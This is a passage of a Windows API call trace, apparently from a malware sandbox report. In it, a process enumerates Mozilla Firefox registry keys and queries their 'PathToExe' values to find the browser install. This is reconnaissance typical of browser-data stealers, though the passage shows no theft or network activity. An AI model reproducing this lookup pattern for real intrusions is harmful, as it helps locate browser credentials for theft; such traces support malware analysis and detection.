phkResult=0x2dfa20*=0x14c) returned 0x0 [0160.172] RegQueryValueExW (in: hKey=0x14c, lpValueName="PathToExe", lpReserved=0x0, lpType=0x2dfa24, lpData=0x0, lpcbData=0x2dfa30*=0x0 | out: lpType=0x2dfa24*=0x0, lpData=0x0, lpcbData=0x2dfa30*=0x0) returned 0x2 [0160.172] RegCloseKey (hKey=0x14c) returned 0x0 [0160.172] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\Crash Reporter", ulOptions=0x0, samDesired=0x20119, phkResult=0x2df9f8 | out: phkResult=0x2df9f8*=0x14c) returned 0x0 [0160.172] RegQueryValueExW (in: hKey=0x14c, lpValueName="PathToExe", lpReserved=0x0, lpType=0x2df9fc, lpData=0x0, lpcbData=0x2dfa08*=0x0 | out: lpType=0x2df9fc*=0x0, lpData=0x0, lpcbData=0x2dfa08*=0x0) returned 0x2 [0160.172] RegCloseKey (hKey=0x14c) returned 0x0 [0160.172] GetProcessHeap () returned 0x8e0000 [0160.172] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x911b80 [0160.172] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\Crash Reporter", phkResult=0x2dfa48 | out: phkResult=0x2dfa48*=0x14c) returned 0x0 [0160.172] RegEnumKeyExW (in: hKey=0x14c, dwIndex=0x0, lpName=0x911b80, lpcchName=0x2dfa44, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x2dfa44, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.172] RegCloseKey (hKey=0x14c) returned 0x0 [0160.172] VirtualQuery (in: lpAddress=0x911b80, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x911000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.172] GetProcessHeap () returned 0x8e0000 [0160.172] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x911b80 | out: hHeap=0x8e0000) returned 1 [0160.172] VirtualQuery (in: lpAddress=0x90b458, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x90b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x8000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.173] GetProcessHeap () returned 0x8e0000 [0160.173] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90b458 | out: hHeap=0x8e0000) returned 1 [0160.173] RegEnumKeyExW (in: hKey=0x148, dwIndex=0x1, lpName=0x910b78, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.173] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0160.173] lstrlenW (lpString="\\") returned 1 [0160.173] GetProcessHeap () returned 0x8e0000 [0160.173] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x34) returned 0x8f9a80 [0160.173] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox" | out: lpString1="Software\\Mozilla\\Firefox") returned="Software\\Mozilla\\Firefox" [0160.173] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox", lpString2="\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0160.173] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0160.173] lstrlenW (lpString="TaskBarIDs") returned 10 [0160.173] GetProcessHeap () returned 0x8e0000 [0160.173] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x48) returned 0x900390 [0160.173] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0160.173] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox\\", lpString2="TaskBarIDs" | out: lpString1="Software\\Mozilla\\Firefox\\TaskBarIDs") returned="Software\\Mozilla\\Firefox\\TaskBarIDs" [0160.173] VirtualQuery (in: lpAddress=0x8f9a80, lpBuffer=0x2dfa38, dwLength=0x1c | out: lpBuffer=0x2dfa38*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1a000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.173] GetProcessHeap () returned 0x8e0000 [0160.173] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a80 | out: hHeap=0x8e0000) returned 1 [0160.173] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\TaskBarIDs", lpSrch="Firefox") returned="Firefox\\TaskBarIDs" [0160.173] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dfa20 | out: phkResult=0x2dfa20*=0x14c) returned 0x0 [0160.173] RegQueryValueExW (in: hKey=0x14c, lpValueName="PathToExe", lpReserved=0x0, lpType=0x2dfa24, lpData=0x0, lpcbData=0x2dfa30*=0x0 | out: lpType=0x2dfa24*=0x0, lpData=0x0, lpcbData=0x2dfa30*=0x0) returned 0x2 [0160.173] RegCloseKey (hKey=0x14c) returned 0x0 [0160.173] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20119, phkResult=0x2df9f8 | out: phkResult=0x2df9f8*=0x14c) returned 0x0 [0160.173] RegQueryValueExW (in: hKey=0x14c, lpValueName="PathToExe", lpReserved=0x0, lpType=0x2df9fc, lpData=0x0, lpcbData=0x2dfa08*=0x0 | out: lpType=0x2df9fc*=0x0, lpData=0x0, lpcbData=0x2dfa08*=0x0) returned 0x2 [0160.173] RegCloseKey (hKey=0x14c) returned 0x0 [0160.173] GetProcessHeap () returned 0x8e0000 [0160.174] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x911b80 [0160.174] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", phkResult=0x2dfa48 | out: phkResult=0x2dfa48*=0x14c) returned 0x0 [0160.174] RegEnumKeyExW (in: hKey=0x14c, dwIndex=0x0, lpName=0x911b80, lpcchName=0x2dfa44, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x2dfa44, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.174] RegCloseKey (hKey=0x14c) returned 0x0 [0160.174] VirtualQuery (in: lpAddress=0x911b80, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x911000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.174] GetProcessHeap () returned 0x8e0000 [0160.174] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x911b80 | out: hHeap=0x8e0000) returned 1 [0160.174] VirtualQuery (in: lpAddress=0x900390, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x900000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x13000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.174] GetProcessHeap () returned 0x8e0000 [0160.174] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x900390 | out: hHeap=0x8e0000) returned 1 [0160.174] RegEnumKeyExW (in: hKey=0x148, dwIndex=0x2, lpName=0x910b78, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.174] RegCloseKey (hKey=0x148) returned 0x0 [0160.174] VirtualQuery (in: lpAddress=0x910b78, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x910000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.174] GetProcessHeap () returned 0x8e0000 [0160.174] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x910b78 | out: hHeap=0x8e0000) returned 1 [0160.174] VirtualQuery (in: lpAddress=0x8f9a40, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1a000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.174] GetProcessHeap () returned 0x8e0000 [0160.174] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a40 | out: hHeap=0x8e0000) returned 1 [0160.174] RegEnumKeyExW (in: hKey=0x100, dwIndex=0x1, lpName=0x90fb70, lpcchName=0x2dfab4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x2dfab4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.174] RegCloseKey (hKey=0x100) returned 0x0 [0160.174] VirtualQuery (in: lpAddress=0x90fb70, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x90f000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.175] GetProcessHeap () returned 0x8e0000 [0160.175] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90fb70 | out: hHeap=0x8e0000) returned 1 [0160.175] StrStrIW (lpFirst="Software\\Mozilla", lpSrch="Firefox") returned 0x0 [0160.175] GetProcessHeap () returned 0x8e0000 [0160.175] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x90fb70 [0160.175] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla", phkResult=0x2dfab8 | out: phkResult=0x2dfab8*=0x100) returned 0x0 [0160.175] RegEnumKeyExW (in: hKey=0x100, dwIndex=0x0, lpName=0x90fb70, lpcchName=0x2dfab4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x2dfab4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.175] lstrlenW (lpString="Software\\Mozilla") returned 16 [0160.175] lstrlenW (lpString="\\") returned 1 [0160.175] GetProcessHeap () returned 0x8e0000 [0160.175] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x24) returned 0x903b48 [0160.175] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla" | out: lpString1="Software\\Mozilla") returned="Software\\Mozilla" [0160.175] lstrcatW (in: lpString1="Software\\Mozilla", lpString2="\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0160.175] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0160.175] lstrlenW (lpString="Firefox") returned 7 [0160.175] GetProcessHeap () returned 0x8e0000 [0160.175] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x32) returned 0x8f9a40 [0160.175] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0160.175] lstrcatW (in: lpString1="Software\\Mozilla\\", lpString2="Firefox" | out: lpString1="Software\\Mozilla\\Firefox") returned="Software\\Mozilla\\Firefox" [0160.175] VirtualQuery (in: lpAddress=0x903b48, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x903000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.175] GetProcessHeap () returned 0x8e0000 [0160.175] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x903b48 | out: hHeap=0x8e0000) returned 1 [0160.175] StrStrIW (lpFirst="Software\\Mozilla\\Firefox", lpSrch="Firefox") returned="Firefox" [0160.175] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dfa58 | out: phkResult=0x2dfa58*=0x148) returned 0x0 [0160.175] RegQueryValueExW (in: hKey=0x148, lpValueName="PathToExe", lpReserved=0x0, lpType=0x2dfa5c, lpData=0x0, lpcbData=0x2dfa68*=0x0 | out: lpType=0x2dfa5c*=0x0, lpData=0x0, lpcbData=0x2dfa68*=0x0) returned 0x2 [0160.175] RegCloseKey (hKey=0x148) returned 0x0 [0160.176] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20119, phkResult=0x2dfa30 | out: phkResult=0x2dfa30*=0x0) returned 0x2 [0160.176] GetProcessHeap () returned 0x8e0000 [0160.176] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x910b78 [0160.176] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox", phkResult=0x2dfa80 | out: phkResult=0x2dfa80*=0x148) returned 0x0 [0160.176] RegEnumKeyExW (in: hKey=0x148, dwIndex=0x0, lpName=0x910b78, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.176] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0160.176] lstrlenW (lpString="\\") returned 1 [0160.176] GetProcessHeap () returned 0x8e0000 [0160.176] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x34) returned 0x8f9a80 [0160.176] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox" | out: lpString1="Software\\Mozilla\\Firefox") returned="Software\\Mozilla\\Firefox" [0160.176] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox", lpString2="\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0160.176] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0160.176] lstrlenW (lpString="TaskBarIDs") returned 10 [0160.176] GetProcessHeap () returned 0x8e0000 [0160.176] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x48) returned 0x900390 [0160.176] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0160.176] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox\\", lpString2="TaskBarIDs" | out: lpString1="Software\\Mozilla\\Firefox\\TaskBarIDs") returned="Software\\Mozilla\\Firefox\\TaskBarIDs" [0160.176] VirtualQuery (in: lpAddress=0x8f9a80, lpBuffer=0x2dfa38, dwLength=0x1c | out: lpBuffer=0x2dfa38*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1a000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.176] GetProcessHeap () returned 0x8e0000 [0160.176] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a80 | out: hHeap=0x8e0000) returned 1 [0160.176] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\TaskBarIDs", lpSrch="Firefox") returned="Firefox\\TaskBarIDs" [0160.176] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dfa20 | out: phkResult=0x2dfa20*=0x14c) returned 0x0 [0160.176] RegQueryValueExW (in: hKey=0x14c, lpValueName="PathToExe", lpReserved=0x0, lpType=0x2dfa24, lpData=0x0, lpcbData=0x2dfa30*=0x0 | out: lpType=0x2dfa24*=0x0, lpData=0x0, lpcbData=0x2dfa30*=0x0) returned 0x2 [0160.176] RegCloseKey (hKey=0x14c) returned 0x0 [0160.177] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20119, phkResult=0x2df9f8 | out: phkResult=0x2df9f8*=0x0) returned 0x2 [0160.177] GetProcessHeap () returned 0x8e0000 [0160.177] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x911b80 [0160.177] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", phkResult=0x2dfa48 | out: phkResult=0x2dfa48*=0x14c) returned 0x0 [0160.177] RegEnumKeyExW (in: hKey=0x14c, dwIndex=0x0, lpName=0x911b80, lpcchName=0x2dfa44, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x2dfa44, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.177] RegCloseKey (hKey=0x14c) returned 0x0 [0160.177] VirtualQuery (in: lpAddress=0x911b80, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x911000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.177] GetProcessHeap () returned 0x8e0000 [0160.177] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x911b80 | out: hHeap=0x8e0000) returned 1 [0160.177] VirtualQuery (in: lpAddress=0x900390, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x900000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x13000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.177] GetProcessHeap () returned 0x8e0000 [0160.177] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x900390 | out: hHeap=0x8e0000) returned 1 [0160.177] RegEnumKeyExW (in: hKey=0x148, dwIndex=0x1, lpName=0x910b78, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.177] RegCloseKey (hKey=0x148) returned 0x0 [0160.177] VirtualQuery (in: lpAddress=0x910b78, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x910000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.177] GetProcessHeap () returned 0x8e0000 [0160.177] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x910b78 | out: hHeap=0x8e0000) returned 1 [0160.177] VirtualQuery (in: lpAddress=0x8f9a40, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1a000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.177] GetProcessHeap () returned 0x8e0000 [0160.177] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a40 | out: hHeap=0x8e0000) returned 1 [0160.177] RegEnumKeyExW (in: hKey=0x100, dwIndex=0x1, lpName=0x90fb70, lpcchName=0x2dfab4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox", lpcchName=0x2dfab4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.177] lstrlenW (lpString="Software\\Mozilla") returned 16 [0160.177] lstrlenW (lpString="\\") returned 1 [0160.177] GetProcessHeap () returned 0x8e0000 [0160.177] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x24) returned 0x903b48 [0160.177] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla" | out: lpString1="Software\\Mozilla") returned="Software\\Mozilla" [0160.177] lstrcatW (in: lpString1="Software\\Mozilla", lpString2="\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0160.178] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0160.178] lstrlenW (lpString="Mozilla Firefox") returned 15 [0160.178] GetProcessHeap () returned 0x8e0000 [0160.178] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x42) returned 0x900390 [0160.178] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0160.178] lstrcatW (in: lpString1="Software\\Mozilla\\", lpString2="Mozilla Firefox" | out: lpString1="Software\\Mozilla\\Mozilla Firefox") returned="Software\\Mozilla\\Mozilla Firefox" [0160.178] VirtualQuery (in: lpAddress=0x903b48, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x903000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.178] GetProcessHeap () returned 0x8e0000 [0160.178] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x903b48 | out: hHeap=0x8e0000) returned 1 [0160.178] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox", lpSrch="Firefox") returned="Firefox" [0160.178] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dfa58 | out: phkResult=0x2dfa58*=0x148) returned 0x0 [0160.178] RegQueryValueExW (in: hKey=0x148, lpValueName="PathToExe", lpReserved=0x0, lpType=0x2dfa5c, lpData=0x0, lpcbData=0x2dfa68*=0x0 | out: lpType=0x2dfa5c*=0x0, lpData=0x0, lpcbData=0x2dfa68*=0x0) returned 0x2 [0160.178] RegCloseKey (hKey=0x148) returned 0x0 [0160.178] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox", ulOptions=0x0, samDesired=0x20119, phkResult=0x2dfa30 | out: phkResult=0x2dfa30*=0x0) returned 0x2 [0160.178] GetProcessHeap () returned 0x8e0000 [0160.178] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x910b78 [0160.178] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox", phkResult=0x2dfa80 | out: phkResult=0x2dfa80*=0x148) returned 0x0 [0160.178] RegEnumKeyExW (in: hKey=0x148, dwIndex=0x0, lpName=0x910b78, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="25.0 (en-US)", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.178] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox") returned 32 [0160.178] lstrlenW (lpString="\\") returned 1 [0160.178] GetProcessHeap () returned 0x8e0000 [0160.178] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x44) returned 0x900430 [0160.178] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox" | out: lpString1="Software\\Mozilla\\Mozilla Firefox") returned="Software\\Mozilla\\Mozilla Firefox" [0160.178] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox", lpString2="\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\") returned="Software\\Mozilla\\Mozilla Firefox\\" [0160.178] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\") returned 33 [0160.178] lstrlenW (lpString="25.0 (en-US)") returned 12 [0160.178] GetProcessHeap () returned 0x8e0000 [0160.179] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x5c) returned 0x909f48 [0160.179] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\") returned="Software\\Mozilla\\Mozilla Firefox\\" [0160.179] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox\\", lpString2="25.0 (en-US)" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)") returned="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)" [0160.179] VirtualQuery (in: lpAddress=0x900430, lpBuffer=0x2dfa38, dwLength=0x1c | out: lpBuffer=0x2dfa38*(BaseAddress=0x900000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x13000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.179] GetProcessHeap () returned 0x8e0000 [0160.179] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x900430 | out: hHeap=0x8e0000) returned 1 [0160.179] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", lpSrch="Firefox") returned="Firefox\\25.0 (en-US)" [0160.179] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dfa20 | out: phkResult=0x2dfa20*=0x14c) returned 0x0 [0160.179] RegQueryValueExW (in: hKey=0x14c, lpValueName="PathToExe", lpReserved=0x0, lpType=0x2dfa24, lpData=0x0, lpcbData=0x2dfa30*=0x0 | out: lpType=0x2dfa24*=0x0, lpData=0x0, lpcbData=0x2dfa30*=0x0) returned 0x2 [0160.179] RegCloseKey (hKey=0x14c) returned 0x0 [0160.179] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", ulOptions=0x0, samDesired=0x20119, phkResult=0x2df9f8 | out: phkResult=0x2df9f8*=0x0) returned 0x2 [0160.179] GetProcessHeap () returned 0x8e0000 [0160.179] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x911b80 [0160.179] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", phkResult=0x2dfa48 | out: phkResult=0x2dfa48*=0x14c) returned 0x0 [0160.179] RegEnumKeyExW (in: hKey=0x14c, dwIndex=0x0, lpName=0x911b80, lpcchName=0x2dfa44, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Main", lpcchName=0x2dfa44, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.179] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)") returned 45 [0160.179] lstrlenW (lpString="\\") returned 1 [0160.179] GetProcessHeap () returned 0x8e0000 [0160.179] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x5e) returned 0x90a7c8 [0160.179] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)") returned="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)" [0160.179] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", lpString2="\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\") returned="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\" [0160.179] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\") returned 46 [0160.179] lstrlenW (lpString="Main") returned 4 [0160.179] GetProcessHeap () returned 0x8e0000 [0160.179] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x66) returned 0x90a830 [0160.179] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\") returned="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\" [0160.179] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\", lpString2="Main" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main") returned="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main" [0160.180] VirtualQuery (in: lpAddress=0x90a7c8, lpBuffer=0x2dfa00, dwLength=0x1c | out: lpBuffer=0x2dfa00*(BaseAddress=0x90a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x9000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.180] GetProcessHeap () returned 0x8e0000 [0160.180] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90a7c8 | out: 